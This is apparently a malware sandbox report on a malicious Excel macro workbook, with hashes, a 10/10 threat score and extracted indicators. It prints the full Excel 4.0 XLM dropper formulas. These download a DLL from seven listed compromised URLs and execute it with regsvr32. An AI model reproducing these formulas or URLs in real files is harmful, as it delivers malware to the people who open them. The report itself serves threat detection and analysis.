Overview

overview

10

Static

static

10

650af61411...4.xlsm

windows7-x64

10

650af61411...4.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

  • Size

    38KB

  • Sample

    241120-j9mjbstepg

  • MD5

    2d53cc73d114ffccf26818f01e275cb6

  • SHA1

    70b1a5c943bf915b8ea4b28ab65eba5e614c45fb

  • SHA256

    650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

  • SHA512

    33f25deed21db7baafa2fd23c78c3946b021de3d2a4ebf6fc82a106e5e44a4baee795f0f4e766d7cf46d05faa9efe258482f0ad471483a9a47017deda1069091

  • SSDEEP

    768:MWV9/1ZJVOwyjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooZz:MWXd4wCOZZ1ZYpoQ/pMA0VIIlt

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/

https://damjangro.org/data/IlBcH2mM/

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/

https://www.awam.be/wp-admin/ug9Zz/

https://protokol.mx/Archivos/SjKWNoeYre/

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/

https://bengtverhoef.nl/stats/SJ1csD7/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.berekethaber.com/dosyalar/4MZnNVw8Z/","..\dfebegfs.ocx",0,0) =IF('HUNJK'!E15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://damjangro.org/data/IlBcH2mM/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.awam.be/wp-admin/ug9Zz/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://protokol.mx/Archivos/SjKWNoeYre/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E23<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E25<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://bengtverhoef.nl/stats/SJ1csD7/","..\dfebegfs.ocx",0,0)) =IF('HUNJK'!E27<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dfebegfs.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://www.berekethaber.com/dosyalar/4MZnNVw8Z/
xlm40.dropper

https://damjangro.org/data/IlBcH2mM/
xlm40.dropper

https://actwell.fr/logs/cGx7Ll6CB2k0NLWDTcL/
xlm40.dropper

https://www.awam.be/wp-admin/ug9Zz/
xlm40.dropper

https://protokol.mx/Archivos/SjKWNoeYre/
xlm40.dropper

https://alfaomega.dk/wp-includes/P4UN9RYvDCJssgv/
xlm40.dropper

https://bengtverhoef.nl/stats/SJ1csD7/

Targets

    • Target

      650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

    • Size

      38KB

    • MD5

      2d53cc73d114ffccf26818f01e275cb6

    • SHA1

      70b1a5c943bf915b8ea4b28ab65eba5e614c45fb

    • SHA256

      650af6141197b50b1dbbc8eb9183d44eab4b6214e0681c53cf22a540e75198d4

    • SHA512

      33f25deed21db7baafa2fd23c78c3946b021de3d2a4ebf6fc82a106e5e44a4baee795f0f4e766d7cf46d05faa9efe258482f0ad471483a9a47017deda1069091

    • SSDEEP

      768:MWV9/1ZJVOwyjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooZz:MWXd4wCOZZ1ZYpoQ/pMA0VIIlt

    Score
    10/10
    discovery

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks